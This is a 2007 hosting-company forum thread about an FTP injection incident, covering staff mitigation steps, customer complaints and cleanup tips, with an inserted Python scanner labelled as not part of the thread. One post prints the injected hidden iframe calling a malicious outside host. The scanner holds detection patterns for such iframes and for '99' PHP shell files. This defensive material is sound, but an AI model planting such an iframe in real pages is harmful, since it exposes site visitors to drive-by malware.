
04-05-2007, 00:15
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,261
|
|
Remote FTP access disabled on all servers
Dear Customers,
We have disabled remote FTP access on all servers. Recently all our servers were targeted by a server based in the Gnax datacenter (US based), and the index pages of certain websites that had weak FTP passwords were injected.
We have executed mass replacement scripts which have removed those injections, but we cannot open the FTP port unless cPanel finds a solution to this problem. Those who need FTP access should request the support team to add their IP address to the allowed list for FTP access for the respective username.
If you still see the injected code in your files then there's no need to panic. Remove it using the file manager in your control panel or request our support team to do so. I will post a link to a form which should be used to request FTP access.
There's a long discussion going on in the cPanel forum regarding these injections but there has been no solution so far. This injection has occurred due to a vulnerability in the pure-ftp service, and nothing else could be done besides injection of iframe code.
There's a long thread running on the cPanel forum: http://forums.cpanel.net/showthread.php?t=62821&page=11
So far no solution. We will need to keep global FTP access disabled till cPanel replies with a solution.
All customers are requested to choose a complicated FTP password of at least 10 characters. You can reset your password from the control panel.
__________________
UK Web Hosting || Business Hosting || eUKhost Knowledgebase
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________
Great Opportunity :: Join our Affiliate Program for FREE and earn 20% commission on each referral.
|

04-05-2007, 11:20
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,261
|
|
We have managed to communicate with the 14-year-old boy from New Zealand whose server was used for this injection attack. We are not able to trace if he is the actual person who did it, but he has given all the scripts and available FTP passwords he had on his server.
We are sending an email to customers whose passwords were on his server, and our phone support team will be calling all those customers in the next 2 days' time.
He used the ftp_exec function to initiate this injection and he managed to get a list of passwords for those accounts which had weak passwords without any numbers or caps in them. We have modified our password policy on the signup page and now every customer will need to choose a password with a minimum of 10 characters.
I will update with further information as we are trying to trap the actual culprit.
|

04-05-2007, 11:51
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 331
|
|
Well done
Can I say well done on your actions and attempts to sort out this whole problem and catch the culprit. I know things have gotten a little 'terse' at times throughout this whole episode, which has taken most of April to resolve, but thanks for all your help.
Regards
|

04-05-2007, 13:02
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,261
|
|
We are looking to track marketing agencies behind this series of injections all over the web. Hopefully they will add eUKhost to their ignore list.
|

04-05-2007, 14:20
|
|
Premium Member
|
|
Join Date: May 2006
Location: Cambridgeshire
Posts: 388
|
|
Could you paste us info on the (types of) files to look out for on the domain, as the cPanel thread requires login first? That way if we spot the file we can take the necessary action. Also, once we've reset our passwords to be at least 10 characters (mixed case + numbers), will the FTP access be automatically restored or should we contact support to request access?
Whilst the lack of access is a bit of an inconvenience, I totally understand why the action has been taken. Far better to go a bit without FTP than spend lots of time having to sort out a messed up website and ensuring the hackers can't get back in.

|

04-05-2007, 14:34
|
 |
Premium Member
|
|
Join Date: Jan 2007
Location: Amersham
Posts: 331
|
|
My advice is get ftp access first
Do the password changes - then request the ftp access. Once you've got that you can use ftp to see the date/time when files/directories have changed - check those files changed recently (April).
I think EUK have cleaned up most of it for you - but look especially at files called index.*
|

04-05-2007, 18:44
|
 |
Junior Member
|
|
Join Date: May 2007
Location: E.s.s.e.x. UK
Posts: 11
|
|
One thing to note...
In order to get access re-applied you will need to have a static IP address from your ISP. Anyone with a dynamic IP address will not be able to get updated!
I've spoken to Support and access to FTP is being worked on by the Admin staff. If all goes well, access will be restored asap. And we will be notified via this forum... So get subscribed.
Now I know why I hate kids... LOL
|

04-05-2007, 20:10
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,261
|
|
Code:
< iframe src='http://huyamilka.com/strong/092/' width=1 height=1>< /iframe >
This was injected in accounts with weak passwords. I was surprised to see all their data, as they had FTP passwords for main accounts which could have been used to access cPanel as well.
We have managed to find the exact thing which was used, as the datacenter hosting huyamilka.com gave all their data to us to verify. Also, the kid whose server was used gave all data to us, and as per that we have disabled the ftp_exec function on our server. So now we have all types of exec functions disabled on the server, which will cause some inconvenience to our customers, but this is high time to switch to secure applications and secure code. Anything done in PHP won't work for your website. It has to exclude all exec functions to work on our servers.
We have reserved 1 server for exec functions, which will be used to migrate accounts of customers who insist on exec functions.
Global FTP access will be restored on all servers once all passwords are changed for the accounts which got targeted. We have abnormal load on the helpdesk for FTP and register_globals, but things will get back to normal in the next 2 days.
|

05-05-2007, 07:14
|
|
new member
|
|
Join Date: May 2007
Posts: 1
|
|
Uploading websites
I was supposed to have two websites go live this weekend, any idea how I can upload them without FTP?
I have already changed my password, but I still can not upload anything. To be honest, I've only had a reseller package a few weeks now, and I'm beginning to regret choosing eukhost as I've had nothing but trouble since moving my websites here.
|

05-05-2007, 09:17
|
 |
Sales Manager
|
|
Join Date: Nov 2005
Posts: 678
|
|
Hello easylie,
We are waiting for all customers to change their passwords before restoring the access to prevent any such problem from re-occurring. As you wish to upload two new websites this weekend, you can contact our support team to add your IP address in the allowed list for FTP access for respective username.
|

05-05-2007, 10:24
|
 |
Junior Member
|
|
Join Date: Apr 2007
Posts: 29
|
|
My password is 21 characters long. I changed it a few weeks ago the second I saw my Index page had altered.
|

05-05-2007, 11:33
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,261
|
|
Quote:
Originally Posted by Hunter
My password is 21 characters long. I changed it a few weeks ago the second I saw my Index page had altered.
|
That's good. I hope you don't forget it.
|

05-05-2007, 11:57
|
 |
Junior Member
|
|
Join Date: Apr 2007
Posts: 29
|
|
I made it 23 now. And no, I can't forget it.
|

05-05-2007, 15:08
|
|
Premium Member
|
|
Join Date: Jan 2007
Posts: 209
|
|
Users should also check their .htaccess file. If its date/time matches the date/time of the attack provided by EUKhost, the contents should be verified.
Additionally, check for the existence of special "shell" files, specifically PHP files that may use the "exec" function to steal weak passwords. A Russian group has a very very powerful and commonly available tool that does this job automatically.
IF USERS SEE "99" IN ANY UNSUSPECTED FILENAME, E.G., 99.php, THEY SHOULD IMMEDIATELY INFORM SUPPORT.
Yeah I shouted because it was needed, but no need to panic. One just needs to be careful and cautious at times of attacks, be it in cyber or real world.
Regds
IJ
|
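The file checks suggested in the posts above (index.* files carrying a 1-pixel iframe, index.* and .htaccess files changed around the attack date, PHP files with "99" in the name), as an added example that is not part of the original thread. The function names, the April 2007 window and the sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from datetime import datetime

# 0- or 1-pixel iframe, the shape of the injected tag quoted in the thread
# (a space after "<" and optional quotes around the values are tolerated).
HIDDEN_IFRAME = re.compile(
    r"<\s*iframe\b(?=[^>]*\bwidth\s*=\s*['\"]?[01]\b)"
    r"(?=[^>]*\bheight\s*=\s*['\"]?[01]\b)[^>]*>", re.IGNORECASE)

def scan_docroot(root, start, end):
    """Return sorted (relative_path, reason) pairs for files worth reviewing."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            low = name.lower()
            mtime = datetime.fromtimestamp(os.path.getmtime(full))
            if low.startswith("index."):
                with open(full, errors="replace") as fh:
                    if HIDDEN_IFRAME.search(fh.read()):
                        findings.append((rel, "hidden-iframe"))
            if start <= mtime <= end and (low.startswith("index.") or low == ".htaccess"):
                findings.append((rel, "modified-in-attack-window"))
            if low.endswith(".php") and "99" in low:
                findings.append((rel, "99-in-php-filename"))
    return sorted(findings)

def build_constructed_sample(root):
    """Write a constructed docroot (not data from the hosts in the thread)."""
    april = datetime(2007, 4, 20, 3, 0).timestamp()   # assumed attack-period mtime
    old = datetime(2006, 11, 1, 12, 0).timestamp()    # untouched or reset mtime
    tag = "<iframe src='http://injected.example/' width=1 height=1></iframe>"
    files = {
        "index.html": ("<html><body>Hi</body>" + tag + "</html>", april),
        "shop/index.php": ("<?php ?>< iframe src='x' width=1 height=1>< /iframe >", old),
        "blog/index.htm": ("<iframe src='/map' width=600 height=400></iframe>", old),
        ".htaccess": ("RewriteEngine On\n", april),
        "images/99.php": ("<?php /* constructed placeholder */ ?>", old),
    }
    for rel, (body, ts) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.utime(path, (ts, ts))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_constructed_sample(d)
        for rel, why in scan_docroot(d, datetime(2007, 4, 1), datetime(2007, 4, 30, 23, 59)):
            print(rel, why)
```

The `shop/index.php` sample has an old modification time but still carries the tag, which is why the content check runs on every index file rather than only on files changed inside the date window.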

05-05-2007, 15:10
|
|
Premium Member
|
|
Join Date: Jan 2007
Posts: 209
|
|
Easylie,
You can upload using CPANEL's file manager.
BTW, your ID seems very interesting!
Regds
IJ
|

06-05-2007, 13:16
|
|
new member
|
|
Join Date: Apr 2007
Posts: 7
|
|
Yeh, my user name is 'easylferay', how 'easylie' came up is a mystery to me. But judging by my experience with eukhosts these last few weeks, it doesn't surprise me.
I have tried cPanel file manager, and nothing is happening, says it can not upload. This has really started to piss me off now. I purchased a hosting package a few weeks back, and it's been an absolute nightmare here. I can't upload websites, support tickets are useless, never get a response, and as for the live chat, the least said the better.
This is my first experience with hosting. I have over 20 websites online with various hosting companies, and for some reason I thought if I had them all under the control of one hosting service, then my life would be easier.
Anyway, I'll give it a few more days and if things don't improve, I'll find a more reliable hosting company and cut my losses.
Nothing to be done for now, I'm off on a trip till tomorrow, perhaps I'll get some time tomorrow to try and get things sorted.
|

06-05-2007, 13:37
|
 |
Chief Marketing Officer
|
|
Join Date: Sep 2005
Posts: 4,261
|
|
We just needed to add your IP address to the allowed list of IPs. This would allow you to connect to any of your resold accounts using the FTP service.
If you had included your IP in any of your tickets in the beginning then the problem would have got solved. Anyway, I've done this for you by allowing your access IP on this forum, so please check if you have still not stepped out for vacation.
|

06-05-2007, 19:27
|
|
Member
|
|
Join Date: May 2007
Posts: 30
|
|
Why don't I ever understand this stuff? But seriously, I know that this is a dumb question, but why do you need an IP address to connect to an account using the FTP service?
|

06-05-2007, 20:13
|
 |
Premium Member
|
|
Join Date: Mar 2007
Location: 127.0.0.1
Posts: 1,195
|
|
Because an IP address is like an address on a house. Each networked device has its own IP so it can access the internet; without an IP address you can't access the net & can't receive any data, just like if your house didn't have an address, you wouldn't be able to receive any post.
__________________
Regards,
Josh Hold
eUKhost Blog: Over 1000 Computer Related Articles to Sink Your Teeth Into!
Super Moderator
I'm only a forum gremlin (moderator), and do not work for eUKhost in any way. Opinions expressed by me are mine only, and do not reflect those of either eUKhost or any company that may be listed above.
|

07-05-2007, 07:48
|
 |
Junior Member
|
|
Join Date: May 2007
Location: E.s.s.e.x. UK
Posts: 11
|
|
Ip Addresses
I'm with AOL and have a Dynamic IP address which changes from time to time. So there's no point in me giving my IP address to eUK host for them to add to the allowed list...
Does this mean I'll never get FTP access back??? 
|
|
All times are GMT.